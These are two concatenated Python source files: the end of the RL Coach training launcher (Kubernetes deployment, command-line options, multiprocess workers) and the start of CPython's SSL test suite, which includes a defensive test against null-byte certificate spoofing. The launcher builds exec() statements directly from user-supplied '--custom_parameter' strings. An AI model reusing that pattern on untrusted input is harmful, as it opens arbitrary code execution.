if '--experiment_name' not in trainer_command:
trainer_command = trainer_command + ['--experiment_name', args.experiment_name]
memory_backend_params = None
if args.memory_backend == "redispubsub":
memory_backend_params = RedisPubSubMemoryBackendParameters()
ds_params_instance = None
if args.data_store == "s3":
ds_params = DataStoreParameters("s3", "", "")
ds_params_instance = S3DataStoreParameters(ds_params=ds_params, end_point=args.s3_end_point, bucket_name=args.s3_bucket_name,
creds_file=args.s3_creds_file, checkpoint_dir=ckpt_inside_container, expt_dir=args.experiment_path)
elif args.data_store == "nfs":
ds_params = DataStoreParameters("nfs", "kubernetes", "")
ds_params_instance = NFSDataStoreParameters(ds_params)
worker_run_type_params = RunTypeParameters(args.image, rollout_command, run_type=str(RunType.ROLLOUT_WORKER), num_replicas=args.num_workers)
trainer_run_type_params = RunTypeParameters(args.image, trainer_command, run_type=str(RunType.TRAINER))
orchestration_params = KubernetesParameters([worker_run_type_params, trainer_run_type_params],
kubeconfig='~/.kube/config',
memory_backend_parameters=memory_backend_params,
data_store_params=ds_params_instance)
orchestrator = Kubernetes(orchestration_params)
if not orchestrator.setup():
print("Could not setup.")
return 1
if orchestrator.deploy_trainer():
print("Successfully deployed trainer.")
else:
print("Could not deploy trainer.")
return 1
if orchestrator.deploy_worker():
print("Successfully deployed rollout worker(s).")
else:
print("Could not deploy rollout worker(s).")
return 1
if args.dump_worker_logs:
screen.log_title("Dumping rollout worker logs in: {}".format(args.experiment_path))
orchestrator.worker_logs(path=args.experiment_path)
exit_code = 1
try:
exit_code = orchestrator.trainer_logs()
except KeyboardInterrupt:
pass
orchestrator.undeploy()
return exit_code
class CoachLauncher(object):
"""
This class is responsible for gathering all user-specified configuration options, parsing them,
instantiating a GraphManager and then starting that GraphManager with either improve() or evaluate().
This class is also responsible for launching multiple processes.
It is structured so that it can be sub-classed to provide alternate mechanisms to configure and launch
Coach jobs.
The key entry-point for this class is the .launch() method which is expected to be called from __main__
and handle absolutely everything for a job.
"""
def launch(self):
"""
Main entry point for the class, and the standard way to run coach from the command line.
Parses command-line arguments through argparse, instantiates a GraphManager and then runs it.
"""
parser = self.get_argument_parser()
args = self.get_config_args(parser)
graph_manager = self.get_graph_manager_from_args(args)
self.run_graph_manager(graph_manager, args)
def get_graph_manager_from_args(self, args: argparse.Namespace) -> 'GraphManager':
"""
Return the graph manager according to the command line arguments given by the user.
:param args: the arguments given by the user
:return: the graph manager, not bound to task_parameters yet.
"""
graph_manager = None
# if a preset was given we will load the graph manager for the preset
if args.preset is not None:
graph_manager = short_dynamic_import(args.preset, ignore_module_case=True)
# for human play we need to create a custom graph manager
if args.play:
from rl_coach.agents.human_agent import HumanAgentParameters
env_params = short_dynamic_import(args.environment_type, ignore_module_case=True)()
env_params.human_control = True
schedule_params = HumanPlayScheduleParameters()
graph_manager = BasicRLGraphManager(HumanAgentParameters(), env_params, schedule_params, VisualizationParameters())
# Set framework
# Note: Some graph managers (e.g. HAC preset) create multiple agents and the attribute is called agents_params
if hasattr(graph_manager, 'agent_params'):
for network_parameters in graph_manager.agent_params.network_wrappers.values():
network_parameters.framework = args.framework
elif hasattr(graph_manager, 'agents_params'):
for ap in graph_manager.agents_params:
for network_parameters in ap.network_wrappers.values():
network_parameters.framework = args.framework
if args.level:
if isinstance(graph_manager.env_params.level, SingleLevelSelection):
graph_manager.env_params.level.select(args.level)
else:
graph_manager.env_params.level = args.level
# set the seed for the environment
if args.seed is not None:
graph_manager.env_params.seed = args.seed
# visualization
graph_manager.visualization_parameters.dump_gifs = graph_manager.visualization_parameters.dump_gifs or args.dump_gifs
graph_manager.visualization_parameters.dump_mp4 = graph_manager.visualization_parameters.dump_mp4 or args.dump_mp4
graph_manager.visualization_parameters.render = args.render
graph_manager.visualization_parameters.tensorboard = args.tensorboard
graph_manager.visualization_parameters.print_networks_summary = args.print_networks_summary
# update the custom parameters
if args.custom_parameter is not None:
unstripped_key_value_pairs = [pair.split('=') for pair in args.custom_parameter.split(';')]
stripped_key_value_pairs = [tuple([pair[0].strip(), pair[1].strip()]) for pair in
unstripped_key_value_pairs if len(pair) == 2]
# load custom parameters into run_dict
for key, value in stripped_key_value_pairs:
exec("graph_manager.{}={}".format(key, value))
return graph_manager
def display_all_presets_and_exit(self):
# list available presets
screen.log_title("Available Presets:")
for preset in sorted(list_all_presets()):
print(preset)
sys.exit(0)
def expand_preset(self, preset):
"""
Replace a short preset name with the full python path, and verify that it can be imported.
"""
if preset.lower() in [p.lower() for p in list_all_presets()]:
preset = "{}.py:graph_manager".format(os.path.join(get_base_dir(), 'presets', preset))
else:
preset = "{}".format(preset)
# if a graph manager variable was not specified, try the default of :graph_manager
if len(preset.split(":")) == 1:
preset += ":graph_manager"
# verify that the preset exists
preset_path = preset.split(":")[0]
if not os.path.exists(preset_path):
screen.error("The given preset ({}) cannot be found.".format(preset))
# verify that the preset can be instantiated
try:
short_dynamic_import(preset, ignore_module_case=True)
except TypeError as e:
traceback.print_exc()
screen.error('Internal Error: ' + str(e) + "\n\nThe given preset ({}) cannot be instantiated."
.format(preset))
return preset
def get_config_args(self, parser: argparse.ArgumentParser) -> argparse.Namespace:
"""
Returns a Namespace object with all the user-specified configuration options needed to launch.
This implementation uses argparse to take arguments from the CLI, but this can be over-ridden by
another method that gets its configuration from elsewhere. An equivalent method however must
return an identically structured Namespace object, which conforms to the structure defined by
get_argument_parser.
This method parses the arguments that the user entered, does some basic validation, and
modification of user-specified values in short form to be more explicit.
:param parser: a parser object which implicitly defines the format of the Namespace that
is expected to be returned.
:return: the parsed arguments as a Namespace
"""
args = parser.parse_args()
if args.nocolor:
screen.set_use_colors(False)
# if no arg is given
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
# list available presets
if args.list:
self.display_all_presets_and_exit()
# Read args from config file for distributed Coach.
if args.distributed_coach and args.distributed_coach_run_type == RunType.ORCHESTRATOR:
coach_config = ConfigParser({
'image': '',
'memory_backend': 'redispubsub',
'data_store': 's3',
's3_end_point': 's3.amazonaws.com',
's3_bucket_name': '',
's3_creds_file': ''
})
try:
coach_config.read(args.distributed_coach_config_path)
args.image = coach_config.get('coach', 'image')
args.memory_backend = coach_config.get('coach', 'memory_backend')
args.data_store = coach_config.get('coach', 'data_store')
if args.data_store == 's3':
args.s3_end_point = coach_config.get('coach', 's3_end_point')
args.s3_bucket_name = coach_config.get('coach', 's3_bucket_name')
args.s3_creds_file = coach_config.get('coach', 's3_creds_file')
except Error as e:
screen.error("Error when reading distributed Coach config file: {}".format(e))
if args.image == '':
screen.error("Image cannot be empty.")
data_store_choices = ['s3', 'nfs']
if args.data_store not in data_store_choices:
screen.warning("{} data store is unsupported.".format(args.data_store))
screen.error("Supported data stores are {}.".format(data_store_choices))
memory_backend_choices = ['redispubsub']
if args.memory_backend not in memory_backend_choices:
screen.warning("{} memory backend is not supported.".format(args.memory_backend))
screen.error("Supported memory backends are {}.".format(memory_backend_choices))
if args.data_store == 's3':
if args.s3_bucket_name == '':
screen.error("S3 bucket name cannot be empty.")
if args.s3_creds_file == '':
args.s3_creds_file = None
if args.play and args.distributed_coach:
screen.error("Playing is not supported in distributed Coach.")
# replace a short preset name with the full path
if args.preset is not None:
args.preset = self.expand_preset(args.preset)
# validate the checkpoints args
if args.checkpoint_restore_dir is not None and not os.path.exists(args.checkpoint_restore_dir):
screen.error("The requested checkpoint folder to load from does not exist.")
# no preset was given. check if the user requested to play some environment on its own
if args.preset is None and args.play and not args.environment_type:
screen.error('When no preset is given for Coach to run, and the user requests human control over '
'the environment, the user is expected to input the desired environment_type and level.'
'\nAt least one of these parameters was not given.')
elif args.preset and args.play:
screen.error("Both the --preset and the --play flags were set. These flags can not be used together. "
"For human control, please use the --play flag together with the environment type flag (-et)")
elif args.preset is None and not args.play:
screen.error("Please choose a preset using the -p flag or use the --play flag together with choosing an "
"environment type (-et) in order to play the game.")
# get experiment name and path
args.experiment_name = logger.get_experiment_name(args.experiment_name)
args.experiment_path = logger.get_experiment_path(args.experiment_name)
if args.play and args.num_workers > 1:
screen.warning("Playing the game as a human is only available with a single worker. "
"The number of workers will be reduced to 1")
args.num_workers = 1
args.framework = Frameworks[args.framework.lower()]
# checkpoints
args.checkpoint_save_dir = os.path.join(args.experiment_path, 'checkpoint') if args.checkpoint_save_secs is not None else None
if args.export_onnx_graph and not args.checkpoint_save_secs:
screen.warning("Exporting ONNX graphs requires setting the --checkpoint_save_secs flag. "
"The --export_onnx_graph will have no effect.")
return args
def get_argument_parser(self) -> argparse.ArgumentParser:
"""
This returns an ArgumentParser object which defines the set of options that customers are expected to supply in order
to launch a coach job.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--preset',
help="(string) Name of a preset to run (class name from the 'presets' directory.)",
default=None,
type=str)
parser.add_argument('-l', '--list',
help="(flag) List all available presets",
action='store_true')
parser.add_argument('-e', '--experiment_name',
help="(string) Experiment name to be used to store the results.",
default='',
type=str)
parser.add_argument('-r', '--render',
help="(flag) Render environment",
action='store_true')
parser.add_argument('-f', '--framework',
help="(string) Neural network framework. Available values: tensorflow, mxnet",
default='tensorflow',
type=str)
parser.add_argument('-n', '--num_workers',
help="(int) Number of workers for multi-process based agents, e.g. A3C",
default=1,
type=int)
parser.add_argument('-c', '--use_cpu',
help="(flag) Use only the cpu for training. If a GPU is not available, this flag will have no "
"effect and the CPU will be used either way.",
action='store_true')
parser.add_argument('-ew', '--evaluation_worker',
help="(flag) If multiple workers are used, add an evaluation worker as well which will "
"evaluate asynchronously and independently during the training. NOTE: this worker will "
"ignore the evaluation settings in the preset's ScheduleParams.",
action='store_true')
parser.add_argument('--play',
help="(flag) Play as a human by controlling the game with the keyboard. "
"This option will save a replay buffer with the game play.",
action='store_true')
parser.add_argument('--evaluate',
help="(int) Run evaluation only, for at least the given number of steps (note that complete "
"episodes are evaluated). This is a convenient way to disable training in order "
"to evaluate an existing checkpoint. If value is 0, or no value is provided, "
"evaluation will run for an infinite number of steps.",
nargs='?',
const=0,
type=int)
parser.add_argument('-v', '--verbosity',
help="(flag) Sets the verbosity level of Coach print outs. Can be either low or high.",
default="low",
type=str)
parser.add_argument('-tfv', '--tf_verbosity',
help="(flag) TensorFlow verbosity level",
default=3,
type=int)
parser.add_argument('--nocolor',
help="(flag) Turn off color-codes in screen logging. Ascii text only",
action='store_true')
parser.add_argument('-s', '--checkpoint_save_secs',
help="(int) Time in seconds between saving checkpoints of the model.",
default=None,
type=int)
parser.add_argument('-crd', '--checkpoint_restore_dir',
help='(string) Path to a folder containing a checkpoint to restore the model from.',
type=str)
parser.add_argument('-dg', '--dump_gifs',
help="(flag) Enable the gif saving functionality.",
action='store_true')
parser.add_argument('-dm', '--dump_mp4',
help="(flag) Enable the mp4 saving functionality.",
action='store_true')
parser.add_argument('-et', '--environment_type',
help="(string) Choose an environment type class to override on top of the selected preset.",
default=None,
type=str)
parser.add_argument('-ept', '--exploration_policy_type',
help="(string) Choose an exploration policy type class to override on top of the selected "
"preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type"
,
default=None,
type=str)
parser.add_argument('-lvl', '--level',
help="(string) Choose the level that will be played in the environment that was selected."
"This value will override the level parameter in the environment class."
,
default=None,
type=str)
parser.add_argument('-cp', '--custom_parameter',
help="(string) Semicolon separated parameters used to override specific parameters on top of"
" the selected preset (or on top of the command-line assembled one). "
"Whenever a parameter value is a string, it should be inputted as '\\\"string\\\"'. "
"For ex.: "
"\"visualization.render=False; num_training_iterations=500; optimizer='rmsprop'\"",
default=None,
type=str)
parser.add_argument('--print_networks_summary',
help="(flag) Print network summary to stdout",
action='store_true')
parser.add_argument('-tb', '--tensorboard',
help="(flag) When using the TensorFlow backend, enable TensorBoard log dumps. ",
action='store_true')
parser.add_argument('-ns', '--no_summary',
help="(flag) Prevent Coach from printing a summary and asking questions at the end of runs",
action='store_true')
parser.add_argument('-d', '--open_dashboard',
help="(flag) Open dashboard with the experiment when the run starts",
action='store_true')
parser.add_argument('--seed',
help="(int) A seed to use for running the experiment",
default=None,
type=int)
parser.add_argument('-onnx', '--export_onnx_graph',
help="(flag) Export the ONNX graph to the experiment directory. "
"This will have effect only if the --checkpoint_save_secs flag is used in order to store "
"checkpoints, since the weights checkpoint are needed for the ONNX graph. "
"Keep in mind that this can cause major overhead on the experiment. "
"Exporting ONNX graphs requires manually installing the tf2onnx package "
"(https://github.com/onnx/tensorflow-onnx).",
action='store_true')
parser.add_argument('-dc', '--distributed_coach',
help="(flag) Use distributed Coach.",
action='store_true')
parser.add_argument('-dcp', '--distributed_coach_config_path',
help="(string) Path to config file when using distributed rollout workers."
"Only distributed Coach parameters should be provided through this config file."
"Rest of the parameters are provided using Coach command line options."
"Used only with --distributed_coach flag."
"Ignored if --distributed_coach flag is not used.",
type=str)
parser.add_argument('--memory_backend_params',
help=argparse.SUPPRESS,
type=str)
parser.add_argument('--data_store_params',
help=argparse.SUPPRESS,
type=str)
parser.add_argument('--distributed_coach_run_type',
help=argparse.SUPPRESS,
type=RunType,
default=RunType.ORCHESTRATOR,
choices=list(RunType))
parser.add_argument('-asc', '--apply_stop_condition',
help="(flag) If set, this will apply a stop condition on the run, defined by reaching a"
"target success rate as set by the environment or a custom success rate as defined "
"in the preset. ",
action='store_true')
parser.add_argument('--dump_worker_logs',
help="(flag) Only used in distributed coach. If set, the worker logs are saved in the experiment dir",
action='store_true')
parser.add_argument('--is_multi_node_test',
help=argparse.SUPPRESS,
action='store_true')
return parser
def run_graph_manager(self, graph_manager: 'GraphManager', args: argparse.Namespace):
if args.distributed_coach and not graph_manager.agent_params.algorithm.distributed_coach_synchronization_type:
screen.error("{} algorithm is not supported using distributed Coach.".format(graph_manager.agent_params.algorithm))
if args.distributed_coach and args.checkpoint_save_secs and graph_manager.agent_params.algorithm.distributed_coach_synchronization_type == DistributedCoachSynchronizationType.SYNC:
screen.warning("The --checkpoint_save_secs or -s argument will be ignored as SYNC distributed coach sync type is used. Checkpoint will be saved every training iteration.")
if args.distributed_coach and not args.checkpoint_save_secs and graph_manager.agent_params.algorithm.distributed_coach_synchronization_type == DistributedCoachSynchronizationType.ASYNC:
screen.error("Distributed coach with ASYNC distributed coach sync type requires --checkpoint_save_secs or -s.")
# Intel optimized TF seems to run significantly faster when limiting to a single OMP thread.
# This will not affect GPU runs.
os.environ["OMP_NUM_THREADS"] = "1"
# turn TF debug prints off
if args.framework == Frameworks.tensorflow:
os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.tf_verbosity)
# turn off the summary at the end of the run if necessary
if not args.no_summary and not args.distributed_coach:
atexit.register(logger.summarize_experiment)
screen.change_terminal_title(args.experiment_name)
task_parameters = TaskParameters(
framework_type=args.framework,
evaluate_only=args.evaluate,
experiment_path=args.experiment_path,
seed=args.seed,
use_cpu=args.use_cpu,
checkpoint_save_secs=args.checkpoint_save_secs,
checkpoint_restore_dir=args.checkpoint_restore_dir,
checkpoint_save_dir=args.checkpoint_save_dir,
export_onnx_graph=args.export_onnx_graph,
apply_stop_condition=args.apply_stop_condition
)
# open dashboard
if args.open_dashboard:
open_dashboard(args.experiment_path)
if args.distributed_coach and args.distributed_coach_run_type != RunType.ORCHESTRATOR:
handle_distributed_coach_tasks(graph_manager, args, task_parameters)
return
if args.distributed_coach and args.distributed_coach_run_type == RunType.ORCHESTRATOR:
exit(handle_distributed_coach_orchestrator(args))
# Single-threaded runs
if args.num_workers == 1:
self.start_single_threaded(task_parameters, graph_manager, args)
else:
self.start_multi_threaded(graph_manager, args)
def start_single_threaded(self, task_parameters, graph_manager: 'GraphManager', args: argparse.Namespace):
# Start the training or evaluation
start_graph(graph_manager=graph_manager, task_parameters=task_parameters)
def start_multi_threaded(self, graph_manager: 'GraphManager', args: argparse.Namespace):
total_tasks = args.num_workers
if args.evaluation_worker:
total_tasks += 1
ps_hosts = "localhost:{}".format(get_open_port())
worker_hosts = ",".join(["localhost:{}".format(get_open_port()) for i in range(total_tasks)])
# Shared memory
class CommManager(BaseManager):
pass
CommManager.register('SharedMemoryScratchPad', SharedMemoryScratchPad, exposed=['add', 'get', 'internal_call'])
comm_manager = CommManager()
comm_manager.start()
shared_memory_scratchpad = comm_manager.SharedMemoryScratchPad()
def start_distributed_task(job_type, task_index, evaluation_worker=False,
shared_memory_scratchpad=shared_memory_scratchpad):
task_parameters = DistributedTaskParameters(
framework_type=args.framework,
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=0 if evaluation_worker else None, # 0 value for evaluation worker as it should run infinitely
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=shared_memory_scratchpad,
seed=args.seed+task_index if args.seed is not None else None, # each worker gets a different seed
checkpoint_save_secs=args.checkpoint_save_secs,
checkpoint_restore_dir=args.checkpoint_restore_dir,
checkpoint_save_dir=args.checkpoint_save_dir,
export_onnx_graph=args.export_onnx_graph,
apply_stop_condition=args.apply_stop_condition
)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
p = Process(target=start_graph, args=(graph_manager, task_parameters))
# p.daemon = True
p.start()
return p
# parameter server
parameter_server = start_distributed_task("ps", 0)
# training workers
# wait a bit before spawning the non chief workers in order to make sure the session is already created
workers = []
workers.append(start_distributed_task("worker", 0))
time.sleep(2)
for task_index in range(1, args.num_workers):
workers.append(start_distributed_task("worker", task_index))
# evaluation worker
if args.evaluation_worker or args.render:
evaluation_worker = start_distributed_task("worker", args.num_workers, evaluation_worker=True)
# wait for all workers
[w.join() for w in workers]
if args.evaluation_worker:
evaluation_worker.terminate()
def main():
launcher = CoachLauncher()
launcher.launch()
if __name__ == "__main__":
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
